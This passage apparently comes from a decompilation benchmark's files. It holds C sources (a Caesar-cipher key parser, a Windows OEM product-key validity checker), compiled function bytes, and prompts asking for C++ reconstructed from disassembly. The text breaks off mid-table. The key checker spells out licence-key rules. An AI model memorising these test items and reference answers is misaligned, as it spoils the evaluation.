optarg); 32 | } 33 | else { 34 | break; 35 | } 36 | case '?': 37 | default: 38 | _exit(1); 39 | } 40 | } 41 | 42 | if(key == 0) { 43 | write(STDERR_FILENO, "Key required.\n", 14); 44 | _exit(1); 45 | } 46 | 47 | if(mode != 0) { 48 | key = 26 - key; 49 | } 50 | 51 | return key; 52 | } -------------------------------------------------------------------------------- /eval/c_corpus/source/winkey_check_2021.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | #define KEYLEN 23 5 | 6 | #define A 5 7 | #define O 3 8 | #define B 7 9 | #define C 5 10 | 11 | int check(char *key) 12 | { 13 | unsigned char a[A+1] = {0}; 14 | unsigned char o[O+1] = {0}; 15 | unsigned char b[B+1] = {0}; 16 | unsigned char c[C+1] = {0}; 17 | 18 | sscanf(key, "%5c-%3c-%7c-%5c", a, o, b, c); 19 | 20 | if(strlen(a) != A || strlen(o) != O || strlen(b) != B || strlen(c) != C) 21 | return -1; 22 | 23 | int dummy; 24 | int year; 25 | sscanf(a, "%3d%2d", &dummy, &year); 26 | 27 | if(dummy < 1 || dummy > 366) 28 | return -1; 29 | 30 | if(year > 03 && year < 95) 31 | return -1; 32 | 33 | if(strcmp(o, "OEM") != 0) 34 | return -1; 35 | 36 | if(ctoi(b[0]) != 0 || ctoi(b[7]) == 0 || ctoi(b[7]) > 8) 37 | return -1; 38 | 39 | int sum = ctoi(b[1]) + ctoi(b[2]) + ctoi(b[3]) + ctoi(b[4]) + ctoi(b[5]) + ctoi(b[6]); 40 | 41 | if(sum % 7 != 0){ 42 | return -1; 43 | } 44 | 45 | return 0; 46 | } -------------------------------------------------------------------------------- /eval/cpp_corpus/disasm/baby_cpp_main_2021.txt: -------------------------------------------------------------------------------- 1 | [85, 72, 137, 229, 72, 131, 236, 32, 199, 69, 252, 0, 0, 0, 0, 137, 125, 248, 72, 137, 117, 240, 131, 125, 248, 2, 15, 132, 53, 0, 0, 0, 72, 191, 160, 65, 64, 0, 0, 0, 0, 0, 72, 190, 4, 32, 64, 0, 0, 0, 0, 0, 232, 39, 254, 255, 255, 72, 137, 199, 72, 190, 48, 16, 64, 0, 0, 0, 0, 0, 232, 37, 254, 255, 255, 191, 2, 0, 0, 0, 232, 43, 254, 255, 255, 72, 139, 69, 240, 72, 139, 120, 8, 232, 62, 254, 255, 255, 137, 69, 236, 199, 69, 232, 1, 0, 0, 0, 131, 125, 236, 0, 15, 143, 53, 0, 0, 0, 72, 191, 160, 65, 64, 0, 0, 0, 0, 0, 72, 190, 21, 32, 64, 0, 0, 0, 0, 0, 232, 209, 253, 255, 255, 72, 137, 199, 72, 190, 48, 16, 64, 0, 0, 0, 0, 0, 232, 207, 253, 255, 255, 191, 2, 0, 0, 0, 232, 213, 253, 255, 255, 139, 125, 236, 232, 205, 0, 0, 0, 242, 15, 44, 192, 137, 69, 228, 131, 125, 228, 1, 15, 142, 57, 0, 0, 0, 139, 69, 236, 153, 247, 125, 228, 131, 250, 0, 15, 133, 22, 0, 0, 0, 139, 69, 236, 153, 247, 125, 228, 3, 69, 232, 137, 69, 232, 139, 69, 228, 3, 69, 232, 137, 69, 232, 233, 0, 0, 0, 0, 139, 69, 228, 131, 192, 255, 137, 69, 228, 233, 189, 255, 255, 255, 139, 69, 232, 59, 69, 236, 15, 133, 55, 0, 0, 0, 72, 191, 128, 64, 64, 0, 0, 0, 0, 0, 72, 190, 43, 32, 64, 0, 0, 0, 0, 0, 232, 62, 253, 255, 255, 72, 137, 199, 72, 190, 48, 16, 64, 0, 0, 0, 0, 0, 232, 60, 253, 255, 255, 199, 69, 252, 0, 0, 0, 0, 233, 50, 0, 0, 0, 72, 191, 128, 64, 64, 0, 0, 0, 0, 0, 72, 190, 52, 32, 64, 0, 0, 0, 0, 0, 232, 7, 253, 255, 255, 72, 137, 199, 72, 190, 48, 16, 64, 0, 0, 0, 0, 0, 232, 5, 253, 255, 255, 199, 69, 252, 1, 0, 0, 0, 139, 69, 252, 72, 131, 196, 32, 93, 195] -------------------------------------------------------------------------------- /eval/cpp_corpus/disasm/blaise_main_2021.txt: -------------------------------------------------------------------------------- 1 | [85, 72, 137, 229, 72, 131, 236, 64, 199, 69, 252, 0, 0, 0, 0, 137, 125, 248, 72, 137, 117, 240, 72, 199, 69, 232, 0, 0, 0, 0, 72, 199, 69, 224, 255, 255, 255, 255, 131, 125, 248, 3, 15, 133, 39, 0, 0, 0, 72, 139, 69, 240, 72, 139, 120, 8, 232, 227, 253, 255, 255, 72, 137, 69, 232, 72, 139, 69, 240, 72, 139, 120, 16, 232, 210, 253, 255, 255, 72, 137, 69, 224, 233, 32, 0, 0, 0, 131, 125, 248, 2, 15, 133, 17, 0, 0, 0, 72, 139, 69, 240, 72, 139, 120, 8, 232, 178, 253, 255, 255, 72, 137, 69, 224, 233, 0, 0, 0, 0, 72, 131, 125, 232, 0, 15, 140, 25, 0, 0, 0, 72, 131, 125, 224, 0, 15, 140, 14, 0, 0, 0, 72, 139, 69, 232, 72, 59, 69, 224, 15, 142, 53, 0, 0, 0, 72, 191, 160, 65, 64, 0, 0, 0, 0, 0, 72, 190, 4, 32, 64, 0, 0, 0, 0, 0, 232, 140, 253, 255, 255, 72, 137, 199, 72, 190, 48, 16, 64, 0, 0, 0, 0, 0, 232, 138, 253, 255, 255, 191, 1, 0, 0, 0, 232, 160, 253, 255, 255, 72, 139, 69, 232, 72, 137, 69, 216, 72, 139, 69, 216, 72, 59, 69, 224, 15, 143, 181, 0, 0, 0, 72, 199, 69, 208, 1, 0, 0, 0, 72, 139, 69, 216, 72, 137, 69, 200, 72, 199, 69, 192, 1, 0, 0, 0, 72, 131, 125, 200, 0, 15, 132, 91, 0, 0, 0, 72, 139, 117, 208, 72, 191, 128, 64, 64, 0, 0, 0, 0, 0, 232, 132, 253, 255, 255, 72, 137, 199, 190, 9, 0, 0, 0, 232, 55, 253, 255, 255, 72, 139, 69, 200, 72, 15, 175, 69, 208, 72, 137, 69, 208, 72, 139, 77, 192, 72, 139, 69, 208, 72, 153, 72, 247, 249, 72, 137, 69, 208, 72, 139, 69, 200, 72, 131, 232, 1, 72, 137, 69, 200, 72, 139, 69, 192, 72, 131, 192, 1, 72, 137, 69, 192, 233, 154, 255, 255, 255, 72, 191, 128, 64, 64, 0, 0, 0, 0, 0, 190, 1, 0, 0, 0, 232, 24, 253, 255, 255, 72, 137, 199, 72, 190, 48, 16, 64, 0, 0, 0, 0, 0, 232, 198, 252, 255, 255, 72, 139, 69, 216, 72, 131, 192, 1, 72, 137, 69, 216, 233, 61, 255, 255, 255, 139, 69, 252, 72, 131, 196, 64, 93, 195] -------------------------------------------------------------------------------- /eval/cpp_corpus/disasm/rumrum_main_2021.txt: -------------------------------------------------------------------------------- 1 | [85, 72, 137, 229, 72, 129, 236, 32, 1, 0, 0, 199, 69, 252, 0, 0, 0, 0, 137, 125, 248, 72, 137, 117, 240, 199, 69, 232, 4, 0, 0, 0, 199, 69, 228, 0, 0, 0, 0, 72, 141, 125, 184, 72, 137, 189, 56, 255, 255, 255, 232, 233, 247, 255, 255, 72, 139, 149, 56, 255, 255, 255, 190, 4, 96, 64, 0, 72, 141, 125, 192, 232, 244, 246, 255, 255, 233, 0, 0, 0, 0, 72, 141, 125, 184, 232, 198, 246, 255, 255, 139, 125, 248, 72, 139, 117, 240, 72, 186, 31, 96, 64, 0, 0, 0, 0, 0, 232, 240, 244, 255, 255, 137, 69, 236, 131, 248, 255, 15, 132, 42, 2, 0, 0, 139, 69, 236, 137, 133, 52, 255, 255, 255, 131, 232, 58, 15, 132, 168, 1, 0, 0, 233, 0, 0, 0, 0, 139, 133, 52, 255, 255, 255, 131, 232, 99, 15, 132, 71, 0, 0, 0, 233, 0, 0, 0, 0, 139, 133, 52, 255, 255, 255, 131, 232, 104, 15, 132, 192, 0, 0, 0, 233, 0, 0, 0, 0, 139, 133, 52, 255, 255, 255, 131, 232, 108, 15, 132, 151, 0, 0, 0, 233, 210, 1, 0, 0, 72, 139, 13, 224, 117, 0, 0, 72, 137, 141, 32, 255, 255, 255, 72, 141, 125, 128, 72, 137, 189, 40, 255, 255, 255, 232, 25, 247, 255, 255, 72, 139, 181, 32, 255, 255, 255, 72, 139, 149, 40, 255, 255, 255, 72, 141, 125, 136, 232, 34, 246, 255, 255, 233, 0, 0, 0, 0, 72, 141, 125, 192, 72, 141, 117, 136, 232, 0, 246, 255, 255, 72, 141, 125, 136, 232, 39, 245, 255, 255, 72, 141, 125, 128, 232, 222, 245, 255, 255, 233, 90, 1, 0, 0, 72, 139, 60, 37, 192, 161, 64, 0, 232, 50, 246, 255, 255, 137, 69, 232, 233, 43, 1, 0, 0, 72, 139, 13, 83, 117, 0, 0, 72, 137, 141, 16, 255, 255, 255, 72, 141, 189, 88, 255, 255, 255, 72, 137, 189, 24, 255, 255, 255, 232, 137, 246, 255, 255, 72, 139, 181, 16, 255, 255, 255, 72, 139, 149, 24, 255, 255, 255, 72, 141, 189, 96, 255, 255, 255, 232, 143, 245, 255, 255, 233, 0, 0, 0, 0, 49, 210, 137, 214, 72, 141, 189, 96, 255, 255, 255, 232, 90, 6, 0, 0, 72, 137, 193, 72, 137, 141, 8, 255, 255, 255, 233, 0, 0, 0, 0, 72, 139, 133, 8, 255, 255, 255, 137, 69, 228, 72, 141, 189, 96, 255, 255, 255, 232, 117, 244, 255, 255, 72, 141, 189, 88, 255, 255, 255, 232, 41, 245, 255, 255, 233, 165, 0, 0, 0, 191, 0, 162, 64, 0, 190, 38, 96, 64, 0, 232, 187, 244, 255, 255, 72, 137, 193, 72, 137, 141, 0, 255, 255, 255, 233, 0, 0, 0, 0, 72, 139, 189, 0, 255, 255, 255, 139, 53, 119, 116, 0, 0, 232, 154, 245, 255, 255, 72, 137, 193, 72, 137, 141, 248, 254, 255, 255, 233, 0, 0, 0, 0, 72, 139, 189, 248, 254, 255, 255, 190, 113, 96, 64, 0, 232, 122, 244, 255, 255, 233, 0, 0, 0, 0, 233, 17, 0, 0, 0, 233, 180, 253, 255, 255, 131, 125, 228, 0, 15, 133, 42, 0, 0, 0, 191, 0, 162, 64, 0, 190, 62, 96, 64, 0, 232, 65, 244, 255, 255, 233, 0, 0, 0, 0, 199, 69, 252, 255, 255, 255, 255, 199, 133, 84, 255, 255, 255, 1, 0, 0, 0, 233, 208, 0, 0, 0, 190, 112, 39, 64, 0, 72, 141, 189, 72, 255, 255, 255, 72, 141, 85, 192, 72, 141, 77, 232, 232, 125, 5, 0, 0, 233, 0, 0, 0, 0, 190, 48, 41, 64, 0, 72, 141, 189, 64, 255, 255, 255, 72, 141, 85, 228, 232, 99, 6, 0, 0, 233, 0, 0, 0, 0, 72, 141, 189, 72, 255, 255, 255, 232, 210, 244, 255, 255, 233, 0, 0, 0, 0, 72, 141, 189, 64, 255, 255, 255, 232, 193, 244, 255, 255, 233, 0, 0, 0, 0, 191, 0, 162, 64, 0, 190, 115, 96, 64, 0, 232, 189, 243, 255, 255, 72, 137, 193, 72, 137, 141, 240, 254, 255, 255, 233, 0, 0, 0, 0, 72, 139, 189, 240, 254, 255, 255, 190, 192, 163, 64, 0, 232, 109, 243, 255, 255, 72, 137, 193, 72, 137, 141, 232, 254, 255, 255, 233, 0, 0, 0, 0, 72, 139, 189, 232, 254, 255, 255, 190, 113, 96, 64, 0, 232, 125, 243, 255, 255, 233, 0, 0, 0, 0, 72, 141, 189, 64, 255, 255, 255, 232, 140, 6, 0, 0, 72, 141, 189, 72, 255, 255, 255, 232, 128, 6, 0, 0, 199, 133, 84, 255, 255, 255, 0, 0, 0, 0, 72, 141, 125, 192, 232, 173, 242, 255, 255, 139, 69, 252, 72, 129, 196, 32, 1, 0, 0, 93, 195] -------------------------------------------------------------------------------- /eval/cpp_corpus/disasm/rumrum_produce_2021.txt: -------------------------------------------------------------------------------- 1 | [85, 72, 137, 229, 72, 129, 236, 144, 0, 0, 0, 72, 137, 125, 136, 137, 117, 252, 190, 128, 163, 64, 0, 72, 141, 125, 232, 72, 137, 125, 128, 232, 188, 9, 0, 0, 72, 139, 117, 128, 191, 32, 163, 64, 0, 232, 62, 1, 0, 0, 233, 0, 0, 0, 0, 191, 192, 163, 64, 0, 190, 114, 96, 64, 0, 232, 218, 9, 0, 0, 136, 193, 136, 141, 127, 255, 255, 255, 233, 0, 0, 0, 0, 138, 133, 127, 255, 255, 255, 168, 1, 15, 133, 5, 0, 0, 0, 233, 29, 0, 0, 0, 199, 69, 208, 1, 0, 0, 0, 233, 129, 0, 0, 0, 72, 139, 117, 136, 72, 141, 125, 144, 232, 208, 248, 255, 255, 233, 0, 0, 0, 0, 139, 85, 252, 72, 141, 125, 176, 72, 141, 117, 144, 232, 91, 254, 255, 255, 233, 0, 0, 0, 0, 191, 168, 163, 64, 0, 72, 141, 117, 176, 232, 152, 9, 0, 0, 233, 0, 0, 0, 0, 72, 141, 125, 176, 232, 26, 249, 255, 255, 72, 141, 125, 144, 232, 17, 249, 255, 255, 72, 141, 125, 232, 232, 184, 9, 0, 0, 233, 0, 0, 0, 0, 72, 191, 80, 163, 64, 0, 0, 0, 0, 0, 232, 148, 248, 255, 255, 199, 69, 208, 0, 0, 0, 0, 72, 141, 125, 232, 232, 244, 9, 0, 0, 139, 69, 208, 133, 192, 15, 132, 10, 0, 0, 0, 233, 0, 0, 0, 0, 233, 66, 0, 0, 0, 233, 252, 254, 255, 255, 72, 129, 196, 144, 0, 0, 0, 93, 195] -------------------------------------------------------------------------------- /eval/cpp_corpus/disasm/yurlungur_mutate_2021.txt: -------------------------------------------------------------------------------- 1 | [85, 72, 137, 229, 72, 131, 236, 48, 72, 137, 125, 248, 72, 137, 117, 240, 72, 141, 125, 232, 49, 246, 186, 2, 0, 0, 0, 232, 64, 3, 0, 0, 72, 141, 125, 224, 49, 246, 186, 1, 0, 0, 0, 232, 48, 3, 0, 0, 72, 139, 69, 240, 72, 137, 69, 208, 72, 139, 117, 248, 72, 141, 125, 232, 232, 75, 3, 0, 0, 137, 193, 72, 139, 69, 208, 72, 99, 201, 72, 1, 200, 72, 137, 69, 216, 72, 139, 117, 248, 72, 141, 125, 224, 232, 46, 3, 0, 0, 137, 194, 193, 226, 1, 131, 234, 1, 72, 139, 69, 216, 15, 182, 8, 1, 209, 136, 8, 72, 139, 69, 216, 15, 182, 0, 131, 248, 9, 15, 142, 7, 0, 0, 0, 72, 139, 69, 216, 198, 0, 1, 72, 139, 69, 216, 15, 182, 0, 131, 248, 5, 15, 142, 7, 0, 0, 0, 72, 139, 69, 216, 198, 0, 4, 72, 131, 196, 48, 93, 195] -------------------------------------------------------------------------------- /eval/cpp_corpus/prompts/baby_cpp_main_2021.txt: -------------------------------------------------------------------------------- 1 | x86 64-bit Assembly: 2 | 3 | default funcA(int argc, char * * argv): 4 | PUSH RBP 5 | MOV RBP,RSP 6 | SUB RSP,0x20 7 | MOV dword ptr [RBP + -0x4],0x0 8 | MOV dword ptr [RBP + -0x8],EDI 9 | MOV qword ptr [RBP + -0x10],RSI 10 | CMP dword ptr [RBP + -0x8],0x2 11 | JZ LAB_00401255 12 | MOV RDI,0x4041a0 13 | MOV RSI,0x402004 14 | CALL std::operator<< 15 | MOV RDI,RAX 16 | MOV RSI,0x401030 17 | CALL std::basic_ostream>::operator<< 18 | MOV EDI,0x2 19 | CALL exit 20 | LAB_00401255: 21 | MOV RAX,qword ptr [RBP + -0x10] 22 | MOV RDI,qword ptr [RAX + 0x8] 23 | CALL atoi 24 | MOV dword ptr [RBP + -0x14],EAX 25 | MOV dword ptr [RBP + -0x18],0x1 26 | CMP dword ptr [RBP + -0x14],0x0 27 | JG LAB_004012ab 28 | MOV RDI,0x4041a0 29 | MOV RSI,0x402015 30 | CALL std::operator<< 31 | MOV RDI,RAX 32 | MOV RSI,0x401030 33 | CALL std::basic_ostream>::operator<< 34 | MOV EDI,0x2 35 | CALL exit 36 | LAB_004012ab: 37 | MOV EDI,dword ptr [RBP + -0x14] 38 | CALL std::sqrt 39 | CVTTSD2SI EAX,XMM0 40 | MOV dword ptr [RBP + -0x1c],EAX 41 | LAB_004012ba: 42 | CMP dword ptr [RBP + -0x1c],0x1 43 | JLE LAB_004012fd 44 | MOV EAX,dword ptr [RBP + -0x14] 45 | CDQ 46 | IDIV dword ptr [RBP + -0x1c] 47 | CMP EDX,0x0 48 | JNZ LAB_004012ea 49 | MOV EAX,dword ptr [RBP + -0x14] 50 | CDQ 51 | IDIV dword ptr [RBP + -0x1c] 52 | ADD EAX,dword ptr [RBP + -0x18] 53 | MOV dword ptr [RBP + -0x18],EAX 54 | MOV EAX,dword ptr [RBP + -0x1c] 55 | ADD EAX,dword ptr [RBP + -0x18] 56 | MOV dword ptr [RBP + -0x18],EAX 57 | LAB_004012ea: 58 | JMP LAB_004012ef 59 | LAB_004012ef: 60 | MOV EAX,dword ptr [RBP + -0x1c] 61 | ADD EAX,-0x1 62 | MOV dword ptr [RBP + -0x1c],EAX 63 | JMP LAB_004012ba 64 | LAB_004012fd: 65 | MOV EAX,dword ptr [RBP + -0x18] 66 | CMP EAX,dword ptr [RBP + -0x14] 67 | JNZ LAB_00401340 68 | MOV RDI,0x404080 69 | MOV RSI,0x40202b 70 | CALL std::operator<< 71 | MOV RDI,RAX 72 | MOV RSI,0x401030 73 | CALL std::basic_ostream>::operator<< 74 | MOV dword ptr [RBP + -0x4],0x0 75 | JMP LAB_00401372 76 | LAB_00401340: 77 | MOV RDI,0x404080 78 | MOV RSI,0x402034 79 | CALL std::operator<< 80 | MOV RDI,RAX 81 | MOV RSI,0x401030 82 | CALL std::basic_ostream>::operator<< 83 | MOV dword ptr [RBP + -0x4],0x1 84 | LAB_00401372: 85 | MOV EAX,dword ptr [RBP + -0x4] 86 | ADD RSP,0x20 87 | POP RBP 88 | RET 89 | //end of function funcA 90 | 91 | Reference Table: 92 | Address Data 93 | 004041a0 undefined1[272] 94 | 00402004 ds "USAGE: ./grade n" 95 | 004041a0 undefined1[272] 96 | 00402015 ds "Don't be so negative." 97 | 00404080 undefined1[272] 98 | 0040202b ds "Perfect!" 99 | 00404080 undefined1[272] 100 | 00402034 ds "Needs improvement." 101 | 102 | Generate just the C++ code for the function that produced the above x86 64-bit assembly. The C++ code should only represent the funcA function. The C++ code is idiomatic and uses standard libraries and range based loops. 103 | -------------------------------------------------------------------------------- /eval/cpp_corpus/prompts/blaise_main_2021.txt: -------------------------------------------------------------------------------- 1 | x86 64-bit Assembly: 2 | 3 | default funcB(int argc, char * * argv): 4 | PUSH RBP 5 | MOV RBP,RSP 6 | SUB RSP,0x40 7 | MOV dword ptr [RBP + -0x4],0x0 8 | MOV dword ptr [RBP + -0x8],EDI 9 | MOV qword ptr [RBP + -0x10],RSI 10 | MOV qword ptr [RBP + -0x18],0x0 11 | MOV qword ptr [RBP + -0x20],-0x1 12 | CMP dword ptr [RBP + -0x8],0x3 13 | JNZ LAB_00401277 14 | MOV RAX,qword ptr [RBP + -0x10] 15 | MOV RDI,qword ptr [RAX + 0x8] 16 | CALL atoll 17 | MOV qword ptr [RBP + -0x18],RAX 18 | MOV RAX,qword ptr [RBP + -0x10] 19 | MOV RDI,qword ptr [RAX + 0x10] 20 | CALL atoll 21 | MOV qword ptr [RBP + -0x20],RAX 22 | JMP LAB_00401297 23 | LAB_00401277: 24 | CMP dword ptr [RBP + -0x8],0x2 25 | JNZ LAB_00401292 26 | MOV RAX,qword ptr [RBP + -0x10] 27 | MOV RDI,qword ptr [RAX + 0x8] 28 | CALL atoll 29 | MOV qword ptr [RBP + -0x20],RAX 30 | LAB_00401292: 31 | JMP LAB_00401297 32 | LAB_00401297: 33 | CMP qword ptr [RBP + -0x18],0x0 34 | JL LAB_004012bb 35 | CMP qword ptr [RBP + -0x20],0x0 36 | JL LAB_004012bb 37 | MOV RAX,qword ptr [RBP + -0x18] 38 | CMP RAX,qword ptr [RBP + -0x20] 39 | JLE LAB_004012f0 40 | LAB_004012bb: 41 | MOV RDI,0x4041a0 42 | MOV RSI,0x402004 43 | CALL std::operator<< 44 | MOV RDI,RAX 45 | MOV RSI,0x401030 46 | CALL std::basic_ostream>::operator<< 47 | MOV EDI,0x1 48 | CALL exit 49 | LAB_004012f0: 50 | MOV RAX,qword ptr [RBP + -0x18] 51 | MOV qword ptr [RBP + -0x28],RAX 52 | LAB_004012f8: 53 | MOV RAX,qword ptr [RBP + -0x28] 54 | CMP RAX,qword ptr [RBP + -0x20] 55 | JG LAB_004013bb 56 | MOV qword ptr [RBP + -0x30],0x1 57 | MOV RAX,qword ptr [RBP + -0x28] 58 | MOV qword ptr [RBP + -0x38],RAX 59 | MOV qword ptr [RBP + -0x40],0x1 60 | LAB_0040131e: 61 | CMP qword ptr [RBP + -0x38],0x0 62 | JZ LAB_00401384 63 | MOV RSI,qword ptr [RBP + -0x30] 64 | MOV RDI,0x404080 65 | CALL std::basic_ostream>::operator<< 66 | MOV RDI,RAX 67 | MOV ESI,0x9 68 | CALL std::operator<< 69 | MOV RAX,qword ptr [RBP + -0x38] 70 | IMUL RAX,qword ptr [RBP + -0x30] 71 | MOV qword ptr [RBP + -0x30],RAX 72 | MOV RCX,qword ptr [RBP + -0x40] 73 | MOV RAX,qword ptr [RBP + -0x30] 74 | CQO 75 | IDIV RCX 76 | MOV qword ptr [RBP + -0x30],RAX 77 | MOV RAX,qword ptr [RBP + -0x38] 78 | SUB RAX,0x1 79 | MOV qword ptr [RBP + -0x38],RAX 80 | MOV RAX,qword ptr [RBP + -0x40] 81 | ADD RAX,0x1 82 | MOV qword ptr [RBP + -0x40],RAX 83 | JMP LAB_0040131e 84 | LAB_00401384: 85 | MOV RDI,0x404080 86 | MOV ESI,0x1 87 | CALL std::basic_ostream>::operator<< 88 | MOV RDI,RAX 89 | MOV RSI,0x401030 90 | CALL std::basic_ostream>::operator<< 91 | MOV RAX,qword ptr [RBP + -0x28] 92 | ADD RAX,0x1 93 | MOV qword ptr [RBP + -0x28],RAX 94 | JMP LAB_004012f8 95 | LAB_004013bb: 96 | MOV EAX,dword ptr [RBP + -0x4] 97 | ADD RSP,0x40 98 | POP RBP 99 | RET 100 | //end of function funcB 101 | 102 | Reference Table: 103 | Address Data 104 | 004041a0 undefined1[272] 105 | 00402004 ds "USAGE: ./blaise (range)" 106 | 00404080 undefined1[272] 107 | 00404080 undefined1[272] 108 | 109 | Generate just the C++ code for the function that produced the above x86 64-bit assembly. The C++ code should only represent the funcB function. The C++ code is idiomatic and uses standard libraries and range based loops. -------------------------------------------------------------------------------- /eval/cpp_corpus/prompts/rumrum_main_2021.txt: -------------------------------------------------------------------------------- 1 | x86 64-bit Assembly: 2 | 3 | default funcC(int argc, char * * argv): 4 | PUSH RBP 5 | MOV RBP,RSP 6 | SUB RSP,0x120 7 | MOV dword ptr [RBP + -0x4],0x0 8 | MOV dword ptr [RBP + -0x8],EDI 9 | MOV qword ptr [RBP + -0x10],RSI 10 | MOV dword ptr [RBP + -0x18],0x4 11 | MOV dword ptr [RBP + -0x1c],0x0 12 | LEA RDI,[RBP + -0x48] 13 | MOV qword ptr [RBP + -0xc8],RDI 14 | CALL std::allocator::allocator 15 | MOV RDX,qword ptr [RBP + -0xc8] 16 | LAB_00402b2e: 17 | MOV ESI,0x406004 18 | LEA RDI,[RBP + -0x40] 19 | CALL std::__cxx11::basic_string,std::allocator>::basic_string 20 | JMP LAB_00402b41 21 | LAB_00402b41: 22 | LEA RDI,[RBP + -0x48] 23 | CALL std::allocator::~allocator 24 | LAB_00402b4a: 25 | MOV EDI,dword ptr [RBP + -0x8] 26 | MOV RSI,qword ptr [RBP + -0x10] 27 | MOV RDX,0x40601f 28 | CALL getopt 29 | MOV dword ptr [RBP + -0x14],EAX 30 | CMP EAX,-0x1 31 | JZ LAB_00402d96 32 | MOV EAX,dword ptr [RBP + -0x14] 33 | MOV dword ptr [RBP + -0xcc],EAX 34 | SUB EAX,0x3a 35 | JZ LAB_00402d26 36 | JMP LAB_00402b83 37 | LAB_00402b83: 38 | MOV EAX,dword ptr [RBP + -0xcc] 39 | SUB EAX,0x63 40 | JZ LAB_00402bd9 41 | JMP LAB_00402b97 42 | LAB_00402b97: 43 | MOV EAX,dword ptr [RBP + -0xcc] 44 | SUB EAX,0x68 45 | JZ LAB_00402c66 46 | JMP LAB_00402bab 47 | LAB_00402bab: 48 | MOV EAX,dword ptr [RBP + -0xcc] 49 | SUB EAX,0x6c 50 | JZ LAB_00402c51 51 | JMP LAB_00402d91 52 | LAB_00402bd9: 53 | MOV RCX,qword ptr [optarg] 54 | MOV qword ptr [RBP + -0xe0],RCX 55 | LEA RDI,[RBP + -0x80] 56 | MOV qword ptr [RBP + -0xd8],RDI 57 | CALL std::allocator::allocator 58 | MOV RSI,qword ptr [RBP + -0xe0] 59 | MOV RDX,qword ptr [RBP + -0xd8] 60 | LAB_00402c05: 61 | LEA RDI,[RBP + -0x78] 62 | CALL std::__cxx11::basic_string,std::allocator>::basic_string 63 | JMP LAB_00402c13 64 | LAB_00402c13: 65 | LEA RDI,[RBP + -0x40] 66 | LEA RSI,[RBP + -0x78] 67 | CALL std::__cxx11::basic_string,std::allocator>::operator= 68 | LEA RDI,[RBP + -0x78] 69 | CALL std::__cxx11::basic_string,std::allocator>::~basic_string 70 | LEA RDI,[RBP + -0x80] 71 | CALL std::allocator::~allocator 72 | JMP LAB_00402d91 73 | LAB_00402c51: 74 | MOV RDI,qword ptr [optarg] 75 | CALL atoi 76 | MOV dword ptr [RBP + -0x18],EAX 77 | JMP LAB_00402d91 78 | LAB_00402c66: 79 | MOV RCX,qword ptr [optarg] 80 | MOV qword ptr [RBP + -0xf0],RCX 81 | LEA RDI,[RBP + -0xa8] 82 | MOV qword ptr [RBP + -0xe8],RDI 83 | CALL std::allocator::allocator 84 | MOV RSI,qword ptr [RBP + -0xf0] 85 | MOV RDX,qword ptr [RBP + -0xe8] 86 | LAB_00402c95: 87 | LEA RDI,[RBP + -0xa0] 88 | CALL std::__cxx11::basic_string,std::allocator>::basic_string 89 | JMP LAB_00402ca6 90 | LAB_00402ca6: 91 | XOR EDX,EDX 92 | MOV ESI,EDX 93 | LEA RDI,[RBP + -0xa0] 94 | CALL std::__cxx11::stoul 95 | MOV RCX,RAX 96 | MOV qword ptr [RBP + -0xf8],RCX 97 | JMP LAB_00402cc5 98 | LAB_00402cc5: 99 | MOV RAX,qword ptr [RBP + -0xf8] 100 | MOV dword ptr [RBP + -0x1c],EAX 101 | LEA RDI,[RBP + -0xa0] 102 | CALL std::__cxx11::basic_string,std::allocator>::~basic_string 103 | LEA RDI,[RBP + -0xa8] 104 | CALL std::allocator::~allocator 105 | JMP LAB_00402d91 106 | LAB_00402d26: 107 | MOV EDI,0x40a200 108 | MOV ESI,0x406026 109 | CALL std::operator<< 110 | MOV RCX,RAX 111 | MOV qword ptr [RBP + -0x100],RCX 112 | JMP LAB_00402d44 113 | LAB_00402d44: 114 | MOV RDI,qword ptr [RBP + -0x100] 115 | MOV ESI,dword ptr [optopt] 116 | CALL std::basic_ostream>::operator<< 117 | MOV RCX,RAX 118 | MOV qword ptr [RBP + -0x108],RCX 119 | JMP LAB_00402d65 120 | LAB_00402d65: 121 | MOV RDI,qword ptr [RBP + -0x108] 122 | MOV ESI,0x406071 123 | CALL std::operator<< 124 | JMP LAB_00402d7b 125 | LAB_00402d7b: 126 | JMP LAB_00402d91 127 | LAB_00402d91: 128 | JMP LAB_00402b4a 129 | LAB_00402d96: 130 | CMP dword ptr [RBP + -0x1c],0x0 131 | JNZ LAB_00402dca 132 | MOV EDI,0x40a200 133 | MOV ESI,0x40603e 134 | CALL std::operator<< 135 | JMP LAB_00402db4 136 | LAB_00402db4: 137 | MOV dword ptr [RBP + -0x4],0xffffffff 138 | MOV dword ptr [RBP + -0xac],0x1 139 | JMP LAB_00402e9a 140 | LAB_00402dca: 141 | MOV ESI,0x402770 142 | LEA RDI,[RBP + -0xb8] 143 | LEA RDX,[RBP + -0x40] 144 | LEA RCX,[RBP + -0x18] 145 | CALL std::thread::thread,_int),_std::basic_string_&,_int_&,_void> 146 | JMP LAB_00402de8 147 | LAB_00402de8: 148 | MOV ESI,0x402930 149 | LEA RDI,[RBP + -0xc0] 150 | LEA RDX,[RBP + -0x1c] 151 | CALL std::thread::thread 152 | JMP LAB_00402e02 153 | LAB_00402e02: 154 | LEA RDI,[RBP + -0xb8] 155 | CALL std::thread::join 156 | JMP LAB_00402e13 157 | LAB_00402e13: 158 | LEA RDI,[RBP + -0xc0] 159 | CALL std::thread::join 160 | JMP LAB_00402e24 161 | LAB_00402e24: 162 | MOV EDI,0x40a200 163 | MOV ESI,0x406073 164 | CALL std::operator<< 165 | MOV RCX,RAX 166 | MOV qword ptr [RBP + -0x110],RCX 167 | JMP LAB_00402e42 168 | LAB_00402e42: 169 | MOV RDI,qword ptr [RBP + -0x110] 170 | MOV ESI,0x40a3c0 171 | CALL std::operator<< 172 | MOV RCX,RAX 173 | MOV qword ptr [RBP + -0x118],RCX 174 | JMP LAB_00402e62 175 | LAB_00402e62: 176 | MOV RDI,qword ptr [RBP + -0x118] 177 | MOV ESI,0x406071 178 | CALL std::operator<< 179 | LAB_00402e73: 180 | JMP LAB_00402e78 181 | LAB_00402e78: 182 | LEA RDI,[RBP + -0xc0] 183 | CALL std::thread::~thread 184 | LEA RDI,[RBP + -0xb8] 185 | CALL std::thread::~thread 186 | MOV dword ptr [RBP + -0xac],0x0 187 | LAB_00402e9a: 188 | LEA RDI,[RBP + -0x40] 189 | CALL std::__cxx11::basic_string,std::allocator>::~basic_string 190 | MOV EAX,dword ptr [RBP + -0x4] 191 | ADD RSP,0x120 192 | POP RBP 193 | RET 194 | //end of function funcC 195 | 196 | Reference Table: 197 | Address Data 198 | 00406004 ds 